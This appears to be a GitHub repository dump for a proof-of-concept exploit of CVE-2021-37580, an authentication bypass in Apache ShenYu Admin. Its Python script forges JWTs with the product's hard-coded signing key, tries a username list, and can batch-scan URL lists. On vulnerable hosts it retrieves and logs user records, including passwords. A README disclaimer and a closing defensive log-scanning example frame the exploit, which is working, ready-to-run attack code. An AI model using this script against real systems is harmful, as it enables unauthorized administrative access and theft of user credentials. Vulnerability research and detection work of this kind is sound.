├── url.txt
├── username.txt
├── .DS_Store
├── _v_images
│   ├── .DS_Store
│   ├── 2021-11-17-22-35-58-image.png
│   ├── 2021-11-17-22-36-45-image.png
│   └── 2021-11-17-23-42-06-image.png
├── README.md
└── CVE-2021-37580.py

--------------------------------------------------------------------------------
/url.txt:
--------------------------------------------------------------------------------
http://localhost:8080

--------------------------------------------------------------------------------
/username.txt:
--------------------------------------------------------------------------------
123
Root
Admin
admin
root

--------------------------------------------------------------------------------
/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CVE-2021-37580/HEAD/.DS_Store

--------------------------------------------------------------------------------
/_v_images/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CVE-2021-37580/HEAD/_v_images/.DS_Store

--------------------------------------------------------------------------------
/_v_images/2021-11-17-22-35-58-image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CVE-2021-37580/HEAD/_v_images/2021-11-17-22-35-58-image.png

--------------------------------------------------------------------------------
/_v_images/2021-11-17-22-36-45-image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CVE-2021-37580/HEAD/_v_images/2021-11-17-22-36-45-image.png

--------------------------------------------------------------------------------
/_v_images/2021-11-17-23-42-06-image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CVE-2021-37580/HEAD/_v_images/2021-11-17-23-42-06-image.png

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2021-37580

> PoC for CVE-2021-37580

## 0x00 Vulnerability principle

Vulnerability write-up: [Apache ShenYu Admin bypass JWT authentication CVE-2021-37580](https://articles.zsxq.com/id_crk7w2w1wjwa.html)

## 0x01 Single URL

```bash
Usage: python3 CVE-2021-37580.py -u url -n username.txt
```

`shenyu-admin-2.4.0`, which is vulnerable, looks like this:

![2021-11-17-22-35-58-image.png](_v_images/2021-11-17-22-35-58-image.png)

`shenyu-admin-2.4.1`, which is not vulnerable, looks like this:

![](_v_images/2021-11-17-22-36-45-image.png)

## 0x02 Batch URL check

```bash
Usage: python3 CVE-2021-37580.py -f url.txt -n username.txt
```

![](_v_images/2021-11-17-23-42-06-image.png)

## 0x03 Script errors

If running the script fails with:

```
AttributeError: module 'jwt' has no attribute 'encode'
```

run the following commands:

```bash
python3 -m pip uninstall jwt
python3 -m pip uninstall pyjwt
python3 -m pip install pyjwt==1.5.3 --user
```

## 0x04 Disclaimer

This tool is intended solely for legally authorized enterprise security work. If you need to test whether the tool works, set up your own target environment.

When using this tool for testing, you must ensure that the activity complies with local laws and regulations and that you have obtained sufficient authorization. Do not scan unauthorized targets.

If you engage in any illegal activity while using this tool, you bear the consequences yourself; we accept no legal or joint liability.

Before installing and using this tool, please read carefully and fully understand every clause. Clauses that limit or exclude liability, or otherwise concern your material rights, may be highlighted in bold or underlined to draw your attention. Unless you have fully read, completely understood and accepted all terms of this agreement, do not install or use this tool. Using it, or accepting this agreement in any other express or implied way, is deemed to mean that you have read and agreed to be bound by it.

--------------------------------------------------------------------------------
/CVE-2021-37580.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date   : 2021-11-17 20:40:04
# @Author : 江南小虫虫 (fwh13612265462@gmail.com)
# @Link   : https://fengwenhua.top
import jwt
import time
import requests
import json
import sys
import argparse
requests.packages.urllib3.disable_warnings()


def generateToken(username):
    headers = {
        "alg": "HS256",
        "typ": "JWT"
    }
    # JWT header: the signing-algorithm configuration
    salt = "2095132720951327"
    # The signing secret. Only the token issuer (who is also the verifier) should
    # hold it; it is what lets the verifier tell a legitimate token from a forged one.
    exp = int(time.time())
    # exp claim; set to the current timestamp here
    payload = {
        "userName": username,
        "exp": exp
    }
    # Payload: normally identifies the logged-in user. A JWT payload is trivially
    # decoded, so never put sensitive data in it (or encrypt it before adding it).

    token = jwt.encode(payload=payload, key=salt,
                       algorithm='HS256', headers=headers).decode('utf-8')
    # Generate the token (.decode() expects the bytes returned by PyJWT 1.x)
    # print(token)
    return token


def load_file(file_path):
    try:
        with open(file_path, 'r') as f:
            content = f.read().splitlines()
            return content
    except Exception as e:
        if 'username.txt' in str(e):
            print(
                '找不到用户名字典文件!!!请用参数-n 指定一个用户名字典.txt,或者新建一个 username.txt,放在脚本的同目录下,文件的内容是,一行一个用户名')
        else:
            print(e)
        sys.exit(-1)


def write_file(data_list):
    # log_time is set in the __main__ block before this is called
    with open('CVE-2021-37580-vul-list-{}.txt'.format(log_time), 'w') as f:
        f.write('\n'.join(data_list))


def poc(host, username):
    url = host + '/dashboardUser'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0',
        'X-Access-Token': generateToken(username)
    }
    r = requests.get(url, headers=headers, verify=False)
    result = r.text
    # print(result)
    if r.status_code == 200 and 'password' in result:
        dataList = json.loads(result)['data']['dataList']
        # print('{} is VUL!! '.format(host))
        # print(dataList)
        return dataList
    else:
        # {"code":600,"message":"token is error"}
        # print('{} is NO VUL'.format(host))
        return False


if __name__ == '__main__':
    if len(sys.argv) == 1:
        print("Usage: python3 CVE-2021-37580.py -u url -n username.txt")
        sys.exit()
    parser = argparse.ArgumentParser(
        description='CVE-2021-37580 poc工具')
    parser.add_argument('-u', '--url', help='指定单个url')
    parser.add_argument('-f', '--file', help='指定url.txt')
    parser.add_argument(
        '-n', '--name', default='username.txt', help='指定用户名文件字典.txt')
    args = parser.parse_args()

    target = args.url
    name_file = args.name
    log_time = int(time.time())
    logs_file = open('CVE-2021-37580-log-{}.txt'.format(log_time), 'w')
    vul = False
    if target:
        if 'http' not in target:
            target = 'http://' + target
        print('[*] checking {}'.format(target))
        print('[*] checking {}'.format(target), file=logs_file)
        try:
            for name in load_file(name_file):
                print('[*] using name: {}'.format(name))
                print('[*] using name: {}'.format(name), file=logs_file)
                res = poc(target, name)
                if res:
                    print('[+] {} is VUL!! '.format(target))
                    print('[+] {} is VUL!! '.format(target), file=logs_file)
                    print(res)
                    vul = True
                    break
            if not vul:
                print('[-] {} is NO VUL!! '.format(target))
                print('[-] {} is NO VUL!! '.format(target), file=logs_file)
        except Exception as e:
            print(e)
    if args.file:
        vul_url_list = []
        try:
            for url in load_file(args.file):
                vul = False  # reset per target, otherwise later non-vulnerable hosts are mis-reported
                if 'http' not in url:
                    url = 'http://' + url
                print('[*] checking {}'.format(url))
                print('[*] checking {}'.format(url), file=logs_file)
                try:
                    for name in load_file(name_file):
                        print('[*] using name: {}'.format(name))
                        print('[*] using name: {}'.format(name), file=logs_file)
                        res = poc(url, name)
                        if res:
                            print('[+] {} is VUL!! '.format(url))
                            print('[+] {} is VUL!! '.format(url),
                                  file=logs_file)
                            print(res)
                            print(res, file=logs_file)
                            vul = True
                            vul_url_list.append(url)
                            break
                    if not vul:
                        print('[-] {} is NO VUL!! '.format(url))
                        print('[-] {} is NO VUL!! '.format(url), file=logs_file)
                except Exception as e:
                    print(e)
                    print(e, file=logs_file)
                print('\r\n')
                print('\r\n', file=logs_file)
        except Exception as e:
            print(e)
            print(e, file=logs_file)
        if len(vul_url_list) > 0:
            write_file(vul_url_list)
            print("有漏洞的url列表已经写入文件当前目录下的 CVE-2021-37580-vul-list.txt 了")
    logs_file.close()
--------------------------------------------------------------------------------
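The script above works because shenyu-admin 2.4.0 verifies `X-Access-Token` with a fixed HS256 key, so anyone can mint a token that passes. As an added, defender-side example (not part of this repository), the stdlib-only Python below does the reverse check an operator of a 2.4.0 instance would run over access logs: any token that verifies under that key was either forged or issued by an instance still on the default secret, and is flagged. The log lines, the `ROTATED-SECRET-PLACEHOLDER` key and the `hs256_jwt` helper (used only to build the sample lines) are constructed for this example.

```python
import base64, hashlib, hmac, json, re

# Hard-coded HS256 key from CVE-2021-37580.py above (the shenyu-admin 2.4.0 default).
DEFAULT_KEY = b"2095132720951327"
TOKEN_RE = re.compile(r"X-Access-Token: (?P<tok>[\w\-]+\.[\w\-]+\.[\w\-]+)")

def b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def hs256_jwt(payload: dict, key: bytes) -> str:
    """Mint an HS256 JWT; used here only to construct the sample log lines."""
    h64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    p64 = b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(key, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    return f"{h64}.{p64}.{b64url_encode(sig)}"

def signed_with_default_key(token: str):
    """Return the claims if the token verifies under DEFAULT_KEY, else None.
    exp is deliberately ignored: a forged token may carry any expiry."""
    try:
        h64, p64, s64 = token.split(".")
        if json.loads(b64url_decode(h64)).get("alg") != "HS256":
            return None
        mac = hmac.new(DEFAULT_KEY, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(mac, b64url_decode(s64)):
            return None
        return json.loads(b64url_decode(p64))
    except (ValueError, TypeError, AttributeError):
        return None

def scan_log(lines):
    """(line number, userName) for every request whose token used the default key."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = TOKEN_RE.search(line)
        claims = signed_with_default_key(m.group("tok")) if m else None
        if claims is not None:
            hits.append((n, claims.get("userName")))
    return hits

# Constructed sample lines: a default-key token, a token signed under a rotated
# secret (placeholder value), and a malformed header value.
SAMPLE_LOG = [
    "GET /dashboardUser X-Access-Token: " + hs256_jwt({"userName": "admin", "exp": 1637160000}, DEFAULT_KEY),
    "GET /dashboardUser X-Access-Token: " + hs256_jwt({"userName": "admin", "exp": 1637160000}, b"ROTATED-SECRET-PLACEHOLDER"),
    "GET /plugin X-Access-Token: not.a.jwt",
]
```

`scan_log(SAMPLE_LOG)` flags only the first line; a hit on a production log means the instance must be upgraded past 2.4.0 and its sessions invalidated.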